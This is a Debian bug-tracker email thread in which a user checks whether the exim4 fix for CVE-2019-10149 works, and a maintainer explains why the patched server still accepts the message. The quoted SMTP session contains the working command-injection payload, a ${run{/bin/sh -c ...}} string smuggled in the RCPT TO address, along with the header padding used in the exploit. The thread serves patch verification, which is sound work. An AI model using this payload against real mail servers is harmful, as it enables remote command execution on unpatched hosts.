Your message dated Tue, 11 Jun 2019 19:40:30 +0200
with message-id <[email protected]>
and subject line Re: Bug#930361: exim4: Further on to CVE-2019-10149
has caused the Debian Bug report #930361,
regarding exim4: Further on to CVE-2019-10149
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
930361: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930361
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: exim4
Version: 4.89-2+deb9u4
Severity: important
Dear Maintainer,
This is just a FYI and I sure hope its nothing.
In light of CVE-2019-10149
What I did was build a vagrant instance with Exim 4.89-2+deb9u3 to
replicate the POC.
Please see https://pastebin.com/raw/EiLbpsH4 for successful
exploitation.
What was of interest to me, I upgraded to 4.89-2+deb9u4 and redid the POC.
Please see https://pastebin.com/raw/iqaJyHt2, but you will see is, the
file POC does not work, BUT mail still gets accepted.
Please see https://pastebin.com/raw/YLS7CBHY
I just want to double check is this is correct / acceptable.
Kind Regards
Brent Clark
P.s. Just a Q of food for thought, should not CHECK_RCPT_LOCAL_LOCALPARTS and /
or
CHECK_RCPT_REMOTE_LOCALPARTS be updated in
/etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs?
-- Package-specific info:
Exim version 4.89 #2 built 28-May-2019 20:13:55
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event
OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz
dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
# /etc/exim4/update-exim4.conf.conf
#
# Edit this file and /etc/mailname by hand and execute update-exim4.conf
# yourself or use 'dpkg-reconfigure exim4-config'
#
# Please note that this is _not_ a dpkg-conffile and that automatic changes
# to this file might happen. The code handling this will honor your local
# changes, so this is usually fine, but will break local schemes that mess
# around with multiple versions of the file.
#
# update-exim4.conf uses this file to determine variable values to generate
# exim configuration macros for the configuration file.
#
# Most settings found in here do have corresponding questions in the
# Debconf configuration, but not all of them.
#
# This is a Debian specific file
dc_eximconfig_configtype='local'
dc_other_hostnames='REMOVED
dc_local_interfaces='127.0.0.1 ; ::1'
dc_readhost=''
dc_relay_domains='stephan.trial.co.za'
dc_minimaldns='false'
dc_relay_nets=''
dc_smarthost=''
CFILEMODE='644'
dc_use_split_config='false'
dc_hide_mailname=''
dc_mailname_in_oh='true'
dc_localdelivery='mail_spool'
mailname:stephan.trial.co.za
# /etc/default/exim4
EX4DEF_VERSION=''
# 'combined' - one daemon running queue and listening on SMTP port
# 'no' - no daemon running the queue
# 'separate' - two separate daemons
# 'ppp' - only run queue with /etc/ppp/ip-up.d/exim4.
# 'nodaemon' - no daemon is started at all.
# 'queueonly' - only a queue running daemon is started, no SMTP listener.
# setting this to 'no' will also disable queueruns from /etc/ppp/ip-up.d/exim4
QUEUERUNNER='combined'
# how often should we run the queue
QUEUEINTERVAL='30m'
# options common to quez-runner and listening daemon
COMMONOPTIONS=''
# more options for the daemon/process running the queue (applies to the one
# started in /etc/ppp/ip-up.d/exim4, too.
QUEUERUNNEROPTIONS=''
# special flags given to exim directly after the -q. See exim(8)
QFLAGS=''
# Options for the SMTP listener daemon. By default, it is listening on
# port 25 only. To listen on more ports, it is recommended to use
# -oX 25:587:10025 -oP /run/exim4/exim.pid
SMTPLISTENEROPTIONS=''
-- System Information:
Debian Release: 9.9
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.9.0-9-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8),
LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages exim4 depends on:
ii debconf [debconf-2.0] 1.5.61
ii exim4-base 4.89-2+deb9u4
ii exim4-daemon-light 4.89-2+deb9u4
exim4 recommends no packages.
exim4 suggests no packages.
-- debconf information:
exim4/drec:
--- End Message ---
--- Begin Message ---
[ all pastebin references unpacked, there is no point hyperlinking to a
tempoary URL instead of quoting]
On 2019-06-11 Brent Clark <[email protected]> wrote:
[...]
> What was of interest to me, I upgraded to 4.89-2+deb9u4 and redid the POC.
> Please see https://pastebin.com/raw/iqaJyHt2,
|-------
|root@stretch:/tmp# nc 127.0.0.1 25
|220 stretch.localdomain ESMTP Exim 4.89 Tue, 11 Jun 2019 14:07:52 +0200
|HELO localhost
|250 stretch.localdomain Hello localhost [127.0.0.1]
|MAIL FROM:<>
|250 OK
|RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
|250 Accepted
|DATA
|354 Enter message, ending with "." on a line by itself
|Received: 1
|Received: 2
|Received: 3
|Received: 4
|Received: 5
|Received: 6
|Received: 7
|Received: 8
|Received: 9
|Received: 10
|Received: 11
|Received: 12
|Received: 13
|Received: 14
|Received: 15
|Received: 16
|Received: 17
|Received: 18
|Received: 19
|Received: 20
|Received: 21
|Received: 22
|Received: 23
|Received: 24
|Received: 25
|Received: 26
|Received: 27
|Received: 28
|Received: 29
|Received: 30
|Received: 31
|.
|250 OK id=1hafZz-0004D0-Ru
|
|500 unrecognized command
|QUIT
|221 stretch.localdomain closing connection
|root@stretch:/tmp# ls -la
|total 36
|drwxrwxrwt 8 root root 4096 Jun 11 14:07 .
|drwxr-xr-x 23 root root 4096 Jun 11 13:40 ..
|drwxrwxrwt 2 root root 4096 Jun 11 13:40 .font-unix
|drwxrwxrwt 2 root root 4096 Jun 11 13:40 .ICE-unix
|drwx------ 3 root root 4096 Jun 11 13:40
systemd-private-5d1060dcb58a4946aed710f5f45dfe13-systemd-timesyncd.service-CwbWnF
|drwxrwxrwt 2 root root 4096 Jun 11 13:40 .Test-unix
|-rwx--x--x 1 vagrant vagrant 1657 Jun 11 13:40 vagrant-shell
|drwxrwxrwt 2 root root 4096 Jun 11 13:40 .X11-unix
|drwxrwxrwt 2 root root 4096 Jun 11 13:40 .XIM-unix
|-------
> but you will see is, the
> file POC does not work, BUT mail still gets accepted.
> Please see https://pastebin.com/raw/YLS7CBHY
|-------
|0m 699 1hafZz-0004D0-Ru <> *** frozen ***
| ${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost
|-------
> I just want to double check is this is correct / acceptable.
[...]
Yes, you are connceting from the same host, i.e. this part of the rcpt ACL:
# Accept if the message comes from one of the hosts for which we are an
# outgoing relay. It is assumed that such hosts are most likely to be MUAs,
# so we set control=submission to make Exim treat the message as a
# submission. It will fix up various errors in the message, for example, the
# lack of a Date: header line. If you are actually relaying out out from
# MTAs, you may want to disable this. If you are handling both relaying from
# MTAs and submissions from MUAs you should probably split them into two
# lists, and handle them differently.
# Recipient verification is omitted here, because in many cases the clients
# are dumb MUAs that don't cope well with SMTP error responses. If you are
# actually relaying out from MTAs, you should probably add recipient
# verification here.
cu Andreas
--
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'
--- End Message ---
